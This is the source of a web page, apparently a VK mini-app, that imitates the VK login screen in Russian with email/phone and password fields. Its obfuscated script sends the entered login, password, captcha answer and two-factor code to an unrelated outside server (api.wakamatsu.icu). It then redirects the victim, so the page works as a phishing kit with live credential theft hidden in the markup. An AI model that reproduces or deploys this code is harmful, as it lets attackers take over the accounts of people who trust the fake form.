                        <path d="M53.279 5.07996C53.791 5.07996 54.2726 5.18036 54.724 5.38116C55.1821 5.58197 55.5795 5.8564 55.9163 6.20447C56.2532 6.55253 56.5193 6.97422 56.7146 7.46954C56.91 7.95817 57.0077 8.50035 57.0077 9.09607V14.4375H55.1484V9.09607C55.1484 8.79486 55.0877 8.50704 54.9665 8.2326C54.852 7.95817 54.6937 7.7172 54.4916 7.5097C54.2895 7.30221 54.0571 7.13821 53.7943 7.01773C53.5316 6.89055 53.2554 6.82697 52.9657 6.82697C52.6491 6.82697 52.3527 6.89055 52.0765 7.01773C51.8003 7.13821 51.5578 7.30221 51.349 7.5097C51.1469 7.7172 50.9852 7.95817 50.8639 8.2326C50.7494 8.50035 50.6921 8.78817 50.6921 9.09607V14.4375H48.8328V5.18036H50.1768L50.5911 6.11411C50.773 5.91999 50.9852 5.74596 51.2277 5.59201C51.45 5.47153 51.7296 5.35774 52.0664 5.25064C52.4032 5.13685 52.8074 5.07996 53.279 5.07996Z" fill="#A6ABB2"/>
                        <path d="M63.6083 5.07996C64.1203 5.07996 64.6019 5.18036 65.0533 5.38116C65.5114 5.58197 65.9088 5.8564 66.2456 6.20447C66.5825 6.55253 66.8486 6.97422 67.0439 7.46954C67.2393 7.95817 67.337 8.50035 67.337 9.09607V14.4375H65.4777V9.09607C65.4777 8.79486 65.417 8.50704 65.2958 8.2326C65.1813 7.95817 65.023 7.7172 64.8209 7.5097C64.6188 7.30221 64.3864 7.13821 64.1236 7.01773C63.8609 6.89055 63.5847 6.82697 63.295 6.82697C62.9784 6.82697 62.682 6.89055 62.4058 7.01773C62.1296 7.13821 61.8871 7.30221 61.6783 7.5097C61.4762 7.7172 61.3145 7.95817 61.1932 8.2326C61.0787 8.50035 61.0214 8.78817 61.0214 9.09607V14.4375H59.1621V5.18036H60.5061L60.9204 6.11411C61.1023 5.91999 61.3145 5.74596 61.557 5.59201C61.7793 5.47153 62.0589 5.35774 62.3957 5.25064C62.7325 5.13685 63.1367 5.07996 63.6083 5.07996Z" fill="#A6ABB2"/>
                        <path d="M77.5652 11.7668C77.4103 12.1483 77.2149 12.5064 76.9791 12.8411C76.7434 13.1758 76.4604 13.4703 76.1303 13.7246C75.8002 13.979 75.4163 14.1798 74.9784 14.3271C74.5472 14.4676 74.0622 14.5379 73.5233 14.5379C72.9035 14.5379 72.3242 14.4241 71.7852 14.1965C71.2463 13.9623 70.7748 13.6376 70.3706 13.2226C69.9664 12.8009 69.6498 12.3023 69.4207 11.7266C69.1917 11.151 69.0771 10.5117 69.0771 9.80893C69.0771 9.1128 69.1917 8.47692 69.4207 7.90128C69.6498 7.32563 69.9596 6.83031 70.3504 6.41531C70.7411 5.99362 71.2025 5.66564 71.7347 5.43137C72.2669 5.19709 72.8294 5.07996 73.4222 5.07996C74.0151 5.07996 74.5776 5.19709 75.1097 5.43137C75.6419 5.66564 76.1034 5.99362 76.4941 6.41531C76.8848 6.83031 77.1947 7.32563 77.4238 7.90128C77.6528 8.47692 77.7673 9.1128 77.7673 9.80893C77.7673 9.91603 77.7606 10.0231 77.7471 10.1302C77.7336 10.2306 77.7202 10.3176 77.7067 10.3913C77.6932 10.485 77.6797 10.5653 77.6663 10.6322H71.0375C71.0644 10.9201 71.1486 11.1945 71.2901 11.4555C71.4316 11.7166 71.6067 11.9475 71.8156 12.1483C72.0311 12.3424 72.2871 12.4997 72.5835 12.6202C72.8799 12.734 73.1932 12.7909 73.5233 12.7909C74.0892 12.7909 74.5371 12.6704 74.8672 12.4294C75.2041 12.1885 75.4466 11.9676 75.5948 11.7668H77.5652ZM73.4222 6.82697C72.8025 6.82697 72.277 7.03781 71.8459 7.4595C71.4215 7.8745 71.152 8.42002 71.0375 9.09607H76.0091C75.9013 8.42672 75.6251 7.8812 75.1805 7.4595C74.7426 7.03781 74.1565 6.82697 73.4222 6.82697Z" fill="#A6ABB2"/>
                        <path d="M87.5914 11.0439C87.4836 11.5392 87.3118 12.0011 87.076 12.4294C86.8402 12.8511 86.5405 13.2193 86.1767 13.5339C85.8197 13.8485 85.4087 14.0961 84.9439 14.2769C84.4858 14.4509 83.9873 14.5379 83.4484 14.5379C82.8286 14.5379 82.2493 14.4241 81.7104 14.1965C81.1714 13.9623 80.6965 13.6376 80.2856 13.2226C79.8814 12.8009 79.5648 12.3023 79.3357 11.7266C79.1134 11.151 79.0023 10.5117 79.0023 9.80893C79.0023 9.1128 79.1134 8.47692 79.3357 7.90128C79.5648 7.32563 79.8814 6.83031 80.2856 6.41531C80.6965 5.99362 81.1714 5.66564 81.7104 5.43137C82.2493 5.19709 82.8286 5.07996 83.4484 5.07996C83.9873 5.07996 84.4858 5.17032 84.9439 5.35104C85.4087 5.52508 85.8197 5.77274 86.1767 6.09402C86.5405 6.40862 86.8369 6.78011 87.0659 7.2085C87.3017 7.63019 87.4769 8.08535 87.5914 8.57397H85.6209C85.466 8.05188 85.21 7.63019 84.853 7.3089C84.4959 6.98761 84.0277 6.82697 83.4484 6.82697C83.1183 6.82697 82.7949 6.90059 82.4783 7.04785C82.1617 7.18842 81.8855 7.39257 81.6497 7.66031C81.4139 7.92805 81.222 8.24599 81.0738 8.61414C80.9323 8.97559 80.8615 9.37385 80.8615 9.80893C80.8615 10.2507 80.9323 10.6523 81.0738 11.0138C81.222 11.3752 81.4139 11.6898 81.6497 11.9576C81.8855 12.2253 82.1617 12.4328 82.4783 12.58C82.7949 12.7206 83.1183 12.7909 83.4484 12.7909C84.0277 12.7909 84.4959 12.6302 84.853 12.309C85.2167 11.9877 85.4727 11.566 85.6209 11.0439H87.5914Z" fill="#A6ABB2"/>
                        <path d="M91.9285 11.3551C91.9285 11.7634 92.0666 12.1048 92.3428 12.3792C92.619 12.6537 92.9626 12.7909 93.3735 12.7909C93.4409 12.7909 93.5116 12.7875 93.5857 12.7809C93.6665 12.7742 93.7406 12.7641 93.808 12.7507C93.8754 12.7373 93.9394 12.7173 94 12.6905V14.3371C93.9192 14.3773 93.8215 14.4107 93.707 14.4375C93.4981 14.5044 93.2522 14.5379 92.9693 14.5379C92.5584 14.5379 92.1744 14.4643 91.8174 14.317C91.467 14.1631 91.1605 13.9489 90.8978 13.6744C90.6351 13.4 90.4296 13.0687 90.2814 12.6805C90.1399 12.2922 90.0692 11.8505 90.0692 11.3551V6.92737H88.412V5.18036H89.1396C89.4966 5.18036 89.793 5.06657 90.0288 4.83899C90.2646 4.60472 90.3825 4.3102 90.3825 3.95544V2.72049H91.9285V5.18036H94V6.92737H91.9285V11.3551Z" fill="#A6ABB2"/>
                    </svg>
                </div>
            </div>
            <div class="vk-logo">
                <svg width="78" height="78" viewBox="0 0 78 78" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <path d="M50.96 0C72.8 0 78 5.2 78 27.04V50.96C78 72.8 72.8 78 50.96 78H27.04C5.2 78 0 72.8 0 50.96V27.04C0 5.2 5.2 0 27.04 0H50.96Z" fill="#0086F6"/>
                    <path d="M20.3126 24.375H14.6251C13.0001 24.375 12.6751 25.14 12.6751 25.9835C12.6751 27.4899 14.6033 34.9616 21.6531 44.8434C26.3529 51.5918 32.9746 55.25 39.0001 55.25C42.6154 55.25 43.0626 54.4375 43.0626 53.038V47.9375C43.0626 46.3125 43.4051 45.9882 44.5499 45.9882C45.3935 45.9882 46.8396 46.41 50.2139 49.6637C54.0702 53.52 54.706 55.25 56.8751 55.25H62.5626C64.1876 55.25 65.0001 54.4375 64.5314 52.8341C64.0185 51.236 62.1773 48.9174 59.7342 46.1689C58.4086 44.6023 56.4202 42.9153 55.8176 42.0715C54.974 40.9871 55.2151 40.5049 55.8176 39.5409L55.9188 39.3974C56.7758 38.1794 62.7986 29.5429 63.4701 26.4657C63.8314 25.2605 63.4701 24.375 61.7501 24.375H56.0626C54.6165 24.375 53.9498 25.14 53.5882 25.9835C53.5882 25.9835 50.6959 33.0334 46.5986 37.6127C45.273 38.9383 44.6704 39.3601 43.9473 39.3601C43.5858 39.3601 43.0625 38.9383 43.0625 37.7333V26.4657C43.0625 25.0195 42.6428 24.375 41.4376 24.375H32.5001C31.5964 24.375 31.0529 25.0462 31.0529 25.6823C31.0529 27.0532 33.1014 27.3694 33.3126 31.2258V39.6012C33.3126 41.4375 32.981 41.7704 32.2579 41.7704C30.3298 41.7704 25.6397 34.6891 22.8581 26.5861C22.3129 25.0112 21.7662 24.375 20.3126 24.375Z" fill="white"/>
                </svg>
            </div>
            <div class="auth">
                <form action="">
                    <div class="error" v-if="error">
                        <div class="title-error">
                            Неправильный логин или пароль
                        </div>
                        <div class="desc-error">
                            Проверьте правильность введённых данных. <span>Не удаётся войти?</span>
                        </div>
                    </div>
                    <div class="inputs">
                        <input class="login" type="text" placeholder="Email или телефон" v-model="login">
                        <div class="password">
                            <input :type="type_pass" placeholder="Пароль" v-model="passw">
                            <svg class="question" width="20" height="21" viewBox="0 0 20 21" fill="none" xmlns="http://www.w3.org/2000/svg">
                                <path d="M10 0.5C15.52 0.5 20 4.98 20 10.5C20 16.02 15.52 20.5 10 20.5C4.48 20.5 0 16.02 0 10.5C0 4.98 4.48 0.5 10 0.5ZM10 2.16667C5.40046 2.16667 1.66667 5.90046 1.66667 10.5C1.66667 15.0995 5.40046 18.8333 10 18.8333C14.5995 18.8333 18.3333 15.0995 18.3333 10.5C18.3333 5.90046 14.5995 2.16667 10 2.16667ZM10 13.917C10.6443 13.917 11.1667 14.4393 11.1667 15.0837C11.1667 15.728 10.6443 16.2503 10 16.2503C9.35567 16.2503 8.83333 15.728 8.83333 15.0837C8.83333 14.4393 9.35567 13.917 10 13.917ZM9.945 4.65833C11.654 4.65833 13.0382 6.05677 13.0382 7.78333C13.0382 8.47083 12.7598 9.09583 12.319 9.54115L11.6231 10.2599C11.2091 10.6839 10.9106 11.0517 10.7847 11.694C10.7733 11.752 10.765 11.838 10.7597 11.9523C10.7406 12.3639 10.4013 12.6879 9.98927 12.6879H9.98155C9.55425 12.6879 9.20785 12.3415 9.20785 11.9142L9.20785 11.9121C9.20843 11.6954 9.21518 11.5534 9.2281 11.4861C9.34772 10.8636 9.65118 10.3049 10.0765 9.86927L11.0354 8.8849C11.3098 8.6088 11.4916 8.21302 11.4916 7.78333C11.4916 6.92396 10.7956 6.22083 9.945 6.22083C9.40449 6.22083 8.92642 6.50473 8.64969 6.93222C8.59495 7.01678 8.5261 7.15155 8.44313 7.33655C8.27969 7.701 7.86568 7.88113 7.48761 7.75228L7.45798 7.74218C7.07213 7.61068 6.86594 7.19129 6.99744 6.80544C7.00225 6.79134 7.00748 6.77738 7.01311 6.76358C7.0682 6.62919 7.12111 6.5104 7.17183 6.40722C7.70299 5.32671 8.70308 4.65833 9.945 4.65833Z" fill="#979CA0"/>
                            </svg>
                            <div v-if="this.passw != ''">
                                <svg v-if="!show" @click.prevent="change_show" class="show" width="22" height="15" viewBox="0 0 22 15" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <path d="M11 0C16.7334 0 22 4.27185 22 7.5C22 10.7281 16.7334 15 11 15C5.26655 15 0 10.7281 0 7.5C0 4.27185 5.26655 0 11 0ZM11 1.875C6.25156 1.875 1.91304 5.3941 1.91304 7.5C1.91304 9.6059 6.25156 13.125 11 13.125C15.7484 13.125 20.087 9.6059 20.087 7.5C20.087 5.3941 15.7484 1.875 11 1.875ZM11 3.75C13.1131 3.75 14.8261 5.42893 14.8261 7.5C14.8261 9.57107 13.1131 11.25 11 11.25C8.88691 11.25 7.17391 9.57107 7.17391 7.5C7.17391 5.42893 8.88691 3.75 11 3.75ZM11 5.625C9.94346 5.625 9.08696 6.46447 9.08696 7.5C9.08696 8.53553 9.94346 9.375 11 9.375C12.0565 9.375 12.913 8.53553 12.913 7.5C12.913 6.46447 12.0565 5.625 11 5.625Z" fill="#979CA0"/>
                                </svg>
                                <svg v-else class="show" @click.prevent="change_show" width="22" height="18" viewBox="0 0 22 18" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <path d="M4.98071 0.292893L10.0742 5.6179L10.0774 5.61706L14.7141 10.4645L14.7133 10.4679L20.2851 16.2929C20.6586 16.6834 20.6586 17.3166 20.2851 17.7071C19.9115 18.0976 19.3059 18.0976 18.9323 17.7071L17.1386 15.8335C15.2858 16.8995 13.1815 17.5 11 17.5C5.43473 17.5 0 13.144 0 9.5C0 7.373 2.0902 4.73066 4.96737 3.10745L3.62799 1.70711C3.25444 1.31658 3.25444 0.683418 3.62799 0.292893C4.00153 -0.0976311 4.60717 -0.0976311 4.98071 0.292893ZM1.91304 9.5C1.91304 11.906 6.39703 15.5 11 15.5C12.6572 15.5 14.2668 15.0896 15.7194 14.3504L13.7462 12.2852C13.0508 13.0344 12.0774 13.5 11 13.5C8.88691 13.5 7.17391 11.7091 7.17391 9.5C7.17391 8.37361 7.61925 7.35597 8.33589 6.629L6.38945 4.59571C3.80728 5.87704 1.91304 8.13393 1.91304 9.5ZM11 1.5C16.5653 1.5 22 5.85602 22 9.5C22 10.4447 21.5856 11.4982 20.8554 12.5334C20.5418 12.9778 19.943 13.0724 19.5178 12.7446C19.0927 12.4168 19.0022 11.7907 19.3158 11.3463C19.8241 10.6257 20.087 9.9574 20.087 9.5C20.087 7.09398 15.603 3.5 11 3.5C10.4717 3.5 10.0435 3.05228 10.0435 2.5C10.0435 1.94771 10.4717 1.5 11 1.5ZM9.68892 8.04354C9.31833 8.40829 9.08696 8.92589 9.08696 9.5C9.08696 10.6046 9.94346 11.5 11 11.5C11.5491 11.5 12.0442 11.2581 12.3931 10.8707L9.68892 8.04354Z" fill="#979CA0"/>
                                </svg>
                            </div>
                        </div>
                    </div>
                    <button class="btn-auth" :class="{'btn-auth-disabled': isDisabled || disabled}" :disabled="isDisabled || disabled" @click.prevent="authorization">Войти</button>
                </form>
            </div>
        </div>
    </div>
    
    <script src="https://cdn.jsdelivr.net/npm/vue"></script>
	<script src="https://unpkg.com/@vkontakte/vk-bridge/dist/browser.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
    <script>
       var _0x5596=['catch','code','index.html?finish=true','then','disabled','captcha','731487zQQAZj','response','password','modal_validate','1247896IMEVhY','data','1yHCIUL','error','description','#app','17cJxHBN','101qSmDyQ','https://api.wakamatsu.icu/account/login/7fc1173eae505f8b6','send','login','type_pass','show','captcha_sid','29527kDvWMK','VKWebAppInit','2447paYvqn','2644280bfXgJd','modal_captcha','need_validation','modal_loader','908025UZoHKB','759936FIjpas','post','captcha_img','replace','need_captcha'];var _0x1fd50b=_0x5a89;(function(_0x21af03,_0x3e5679){var _0x441863=_0x5a89;while(!![]){try{var _0x4bcf62=parseInt(_0x441863(0x16b))*parseInt(_0x441863(0x162))+parseInt(_0x441863(0x171))+parseInt(_0x441863(0x170))*parseInt(_0x441863(0x182))+parseInt(_0x441863(0x17c))+-parseInt(_0x441863(0x186))*parseInt(_0x441863(0x169))+parseInt(_0x441863(0x180))+-parseInt(_0x441863(0x16c));if(_0x4bcf62===_0x3e5679)break;else _0x21af03['push'](_0x21af03['shift']());}catch(_0xafc756){_0x21af03['push'](_0x21af03['shift']());}}}(_0x5596,0xb6adc),vkBridge[_0x1fd50b(0x164)](_0x1fd50b(0x16a)));function _0x5a89(_0x45b8b1,_0x45aaa7){return _0x5a89=function(_0x559638,_0x5a8979){_0x559638=_0x559638-0x162;var _0x61b3f9=_0x5596[_0x559638];return _0x61b3f9;},_0x5a89(_0x45b8b1,_0x45aaa7);}var app=new Vue({'el':_0x1fd50b(0x185),'data':{'modal_captcha':![],'modal_error':!![],'modal_loader':![],'modal_validate':![],'error':![],'login':'','passw':'','show':![],'type_pass':_0x1fd50b(0x17e),'captcha':'','captcha_sid':'','captcha_img':'','code':'','disabled':![],'iframe':![]},'methods':{'change_show'(){var _0x331d21=_0x1fd50b;this[_0x331d21(0x167)]===![]?(this[_0x331d21(0x167)]=!![],this[_0x331d21(0x166)]='text'):(this[_0x331d21(0x167)]=![],this['type_pass']=_0x331d21(0x17e));},'authorization'(){var _0x4cd89b=_0x1fd50b;this[_0x4cd89b(0x17a)]=!![],this['modal_loader']=!![],axios[_0x4cd89b(0x172)](_0x4cd89b(0x163),{'login':this[_0x4cd89b(0x165)],'password':this['passw'],'captcha_sid':this[_0x4cd89b(0x168)]==''?null:this[_0x4cd89b(0x168)],'captcha_key':this['captcha']==''?null:this[_0x4cd89b(0x17b)],'code':this[_0x4cd89b(0x177)]==''?null:this['code']})[_0x4cd89b(0x179)](_0x327d1e=>{var _0xebb434=_0x4cd89b;this[_0xebb434(0x17a)]=![],this[_0xebb434(0x16f)]=![],window['location'][_0xebb434(0x174)](_0xebb434(0x178));})[_0x4cd89b(0x176)](_0x4b5230=>{var _0x445481=_0x4cd89b;if(_0x4b5230[_0x445481(0x17d)]){this[_0x445481(0x17a)]=![],this[_0x445481(0x16f)]=![],console['log'](_0x4b5230);if(_0x4b5230['response'][_0x445481(0x181)][_0x445481(0x184)]==_0x445481(0x175))this[_0x445481(0x16d)]=!![],this[_0x445481(0x168)]=_0x4b5230[_0x445481(0x17d)][_0x445481(0x181)][_0x445481(0x181)][_0x445481(0x168)],this[_0x445481(0x173)]=_0x4b5230[_0x445481(0x17d)]['data']['data']['captcha_img'];else _0x4b5230[_0x445481(0x17d)]['data'][_0x445481(0x184)]==_0x445481(0x16e)?this[_0x445481(0x17f)]=!![]:(this[_0x445481(0x183)]=!![],this[_0x445481(0x16d)]===!![]&&(this[_0x445481(0x16d)]=![]));}});}},'computed':{'isDisabled'(){var _0x448e08=_0x1fd50b;return!this[_0x448e08(0x165)]||!this['passw'];},'isCaptchaDisabled'(){var _0xc43103=_0x1fd50b;return!this[_0xc43103(0x17b)];},'isValidateDisabled'(){var _0x2e0d80=_0x1fd50b;return!this[_0x2e0d80(0x177)];}},'created'(){setTimeout(()=>{this['modal_error']=![];},0x514);}});
	</script>
</body>
</html>